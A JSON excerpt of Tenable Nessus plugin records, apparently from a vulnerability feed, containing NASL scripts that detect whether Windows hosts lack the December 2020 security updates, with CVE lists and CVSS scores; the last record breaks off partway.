["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592464.NASL", "href": "https://www.tenable.com/plugins/nessus/143565", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143565);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592464\");\n script_xref(name:\"MSFT\", value:\"MS20-4592464\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592464: Windows 10 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592464.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17096)\");\n # https://support.microsoft.com/en-us/help/4592464/windows-10-update-kb4592464\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3feae7ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592464.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592464');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592464])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T00:49:36", "description": "The remote Windows host is missing security update 4592503 or cumulative update 4592471. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592503: Windows 7 and Windows Server 2008 R2 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592471.NASL", "href": "https://www.tenable.com/plugins/nessus/143572", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143572);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592471\");\n script_xref(name:\"MSKB\", value:\"4592503\");\n script_xref(name:\"MSFT\", value:\"MS20-4592471\");\n script_xref(name:\"MSFT\", value:\"MS20-4592503\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592503: Windows 7 and Windows Server 2008 R2 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592503\nor cumulative update 4592471. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592471/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592503/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592503 or Cumulative Update KB4592471.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16964\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592471', '4592503');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592471, 4592503])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:34:03", "description": "The remote Windows host is missing security update 4592497 or cumulative update 4592468. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592497: Windows Server 2012 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592468.NASL", "href": "https://www.tenable.com/plugins/nessus/143559", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143559);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592497\");\n script_xref(name:\"MSKB\", value:\"4592468\");\n script_xref(name:\"MSFT\", value:\"MS20-4592497\");\n script_xref(name:\"MSFT\", value:\"MS20-4592468\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592497: Windows Server 2012 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592497\nor cumulative update 4592468. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17096)\");\n # https://support.microsoft.com/en-us/help/4592497/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d639ba48\");\n # https://support.microsoft.com/en-us/help/4592468/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d79ac842\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592497 or Cumulative Update KB4592468.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592497', '4592468');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592497, 4592468])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:32:55", "description": "The remote Windows host is missing security update 4592495 or cumulative update 4592484. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592495: Windows 8.1 and Windows Server 2012 R2 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592484.NASL", "href": "https://www.tenable.com/plugins/nessus/143560", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143560);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592495\");\n script_xref(name:\"MSKB\", value:\"4592484\");\n script_xref(name:\"MSFT\", value:\"MS20-4592495\");\n script_xref(name:\"MSFT\", value:\"MS20-4592484\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592495: Windows 8.1 and Windows Server 2012 R2 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592495\nor cumulative update 4592484. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17096)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592495/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592484/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592495 or Cumulative Update KB4592484.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-12';\nkbs = make_list('4592495', '4592484');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592495, 4592484])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:15:01", "description": "The remote Windows host is missing security update 4592504 or cumulative update 4592498. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098)", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592504: Windows Server 2008 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17098"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592498.NASL", "href": "https://www.tenable.com/plugins/nessus/143562", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143562);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\"CVE-2020-17098\");\n script_xref(name:\"MSKB\", value:\"4592504\");\n script_xref(name:\"MSKB\", value:\"4592498\");\n script_xref(name:\"MSFT\", value:\"MS20-4592504\");\n script_xref(name:\"MSFT\", value:\"MS20-4592498\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592504: Windows Server 2008 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592504\nor cumulative update 4592498. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098)\");\n # https://support.microsoft.com/en-us/help/4592504/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a272a17b\");\n # https://support.microsoft.com/en-us/help/4592498/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c43d069\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592504 or Cumulative Update KB4592498.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17098\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592504', '4592498');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_NOTE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592504, 4592498])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_note();\n 